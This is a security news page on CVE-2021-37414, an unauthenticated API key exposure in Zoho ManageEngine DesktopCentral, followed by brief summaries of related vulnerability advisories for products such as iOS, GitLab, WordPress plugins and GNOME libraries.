Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-37414: Vulnerability: Improper Authorization Handling

Zoho ManageEngine DesktopCentral version 10.1.2119.7 and prior allows anyone to get a valid user’s APIKEY without authentication.

CVE

Related news

CVE-2021-35053: List of Advisories

Possible system denial of service in case of arbitrary changing Firefox browser parameters. An attacker could change specific Firefox browser parameters file in a certain way and then reboot the system to make the system unbootable.

CVE-2021-30816: About the security content of iOS 15 and iPadOS 15

The issue was addressed with improved permissions logic. This issue is fixed in iOS 15 and iPadOS 15. An attacker with physical access to a device may be able to see private contact information.

CVE-2020-23058

An issue in the authentication mechanism in Nong Ge File Explorer v1.4 unauthenticated allows to access sensitive data.

Canopy Parental Control App Wide Open to Unpatched XSS Bugs

The possible cyberattacks include disabling monitoring, location-tracking of children and malicious redirects of parent-console users.

Google to Enable Two-Factor Authentication for 150M More Users

The company also provided guidance on how to protect information stored in inactive accounts.

CVE-2021-39889: HackerOne

In all versions of GitLab EE since version 14.1, due to an insecure direct object reference vulnerability, an endpoint may reveal the protected branch name to a malicious user who makes a crafted API call with the ID of the protected branch.

CVE-2021-23857: Multiple vulnerabilities in Rexroth IndraMotion and IndraLogic series

Login with hash: The login routine allows the client to log in to the system not by using the password, but by using the hash of the password. Combined with CVE-2021-23858, this allows an attacker to subsequently login to the system.

1Password and Fastmail Partner to Boost Online Privacy

Allows users to securely generate unique email aliases, adding an extra layer of online privacy.

CVE-2021-20034: Security Advisory

An improper access control vulnerability in SMA100 allows a remote unauthenticated attacker to bypass the path traversal checks and delete an arbitrary file potentially resulting in a reboot to factory default settings.

CVE-2021-41011: HackerOne

LINE client for iOS before 11.15.0 might expose authentication information for a certain service to external entities under certain conditions. This is usually impossible, but in combination with a server-side bug, attackers could get this information.

CVE-2021-39339: Vulnerability Advisories - Wordfence

The Telefication WordPress plugin is vulnerable to Open Proxy and Server-Side Request Forgery via the ~/bypass.php file due to a user-supplied URL request value that gets called by a curl requests. This affects versions up to, and including, 1.8.0.

CVE-2021-41390: Ericsson ECM (Enterprise Content Management) solution Vulnerable to CSV Injection

In Ericsson ECM before 18.0, it was observed that Security Provider Endpoint in the User Profile Management Section is vulnerable to CSV Injection.

CVE-2021-41391: Ericsson ECM (Enterprise Content Management) solution Vulnerable to Stored XSS.

In Ericsson ECM before 18.0, it was observed that Security Management Endpoint in User Profile Management Section is vulnerable to stored XSS via a name, leading to session hijacking and full account takeover.

CVE-2021-37414: Vulnerability: Improper Authorization Handling

Zoho ManageEngine DesktopCentral before 10.0.709 allows anyone to get a valid user's APIKEY without authentication.

CVE-2021-38324: Vulnerability Advisories - Wordfence

The SP Rental Manager WordPress plugin is vulnerable to SQL Injection via the orderby parameter found in the ~/user/shortcodes.php file which allows attackers to retrieve information contained in a site's database, in versions up to and including 1.5.3.

CVE-2021-30875: About the security content of iOS 15.1 and iPadOS 15.1

A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 15.1 and iPadOS 15.1. A local attacker may be able to view contacts from the lock screen.

CVE-2021-30884: About the security content of iOS 15 and iPadOS 15

The issue was resolved with additional restrictions on CSS compositing. This issue is fixed in tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Visiting a maliciously crafted website may reveal a user's browsing history.

CVE-2021-30867: About the security content of iOS 15 and iPadOS 15

The issue was addressed with improved authentication. This issue is fixed in iOS 15 and iPadOS 15. A malicious application may be able to access photo metadata without needing permission to access photos.

CVE-2021-30918: About the security content of iOS 14.8.1 and iPadOS 14.8.1

A Lock Screen issue was addressed with improved state management. This issue is fixed in iOS 14.8.1 and iPadOS 14.8.1, iOS 15.0.1 and iPadOS 15.0.1. A user may be able to view restricted content from the Lock Screen.

CVE-2021-39365: (CVE-2021-39365) Missing TLS certificate verification (#146) · Issues · GNOME / grilo · GitLab

In GNOME grilo though 0.3.13, grl-net-wc.c does not enable TLS certificate verification on the SoupSessionAsync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.

CVE-2021-39360: Reminder: SoupSessionSync and SoupSessionAsync default to no TLS certificate verification – Michael Catanzaro's Blog

In GNOME libzapojit through 0.0.3, zpj-skydrive.c does not enable TLS certificate verification on the SoupSessionSync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.

CVE-2019-5452: HackerOne

Bypass lock protection in the Nextcloud Android app prior to version 3.6.2 causes leaking of thumbnails when requesting the Android content provider although the lock protection was not solved.

CVE-2019-5451: HackerOne

Bypass lock protection in the Nextcloud Android app prior to version 3.6.1 allows accessing the files when repeatedly opening and closing the app in a very short time.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907